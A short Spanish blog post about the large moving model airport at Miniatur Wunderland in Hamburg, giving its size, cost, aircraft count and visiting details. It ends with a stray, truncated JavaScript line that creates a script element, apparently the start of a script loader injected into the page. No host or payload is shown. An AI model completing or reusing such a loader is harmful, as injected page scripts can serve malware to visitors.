Aeropuerto a escala

25/10/2011

Esta maqueta móvil (al principio cuesta darse cuenta de que realmente lo es porque parece completamente real) esta situada en el Miniatur Wunderland en Hamburgo. Hasta hace poco, este maravilloso museo era conocido por disponer de la mayor maqueta de trenes del mundo, pero desde el mes de Mayo pasado la nueva estrella del museo es esta increíble maqueta de un aeropuerto que incluye más de 40 aeronaves (desde Cessnitas a A380, pasando según se ve en los vídeos por algún que otro Antonov A225) que realizan unas 360 operaciones de despegue y aterrizaje diarias. La maqueta incluye otros 4.500 vehículos, de los cuales, alrededor de un centenar, tienen también movimiento: camiones de bomberos, remolques, escaleras móviles y fingers.

La construcción de esta maqueta -la mayor de su categoría en el mundo- ha llevado más de cinco años (unas 150.000 horas de trabajo), ocupa una superficie de 150 m² y ha costado unos 3.5 millones de euros.

Durante la construcción, el museo fue realizando una especie de diario de la construccion en vídeo en el que se pueden ver muchos de los recursos y trucos utilizados para dar mayor realismo. En uno de los últimos (a continuación) se pueden ver las pruebas finales pocas semanas antes de la inauguración en la que se ve el grado de realismo al que llegan algunos de los elementos.

Es posible realizar una visita especial a esta maqueta (12 €) durante la que se puede ver la sala de control, y todo el cableado bajo las montañas Suizas. Sin duda una espectacular e inolvidable visita con la que gastar unas horas en la ciudad alemana.

var d=document;var s=d.createElement(‘script’);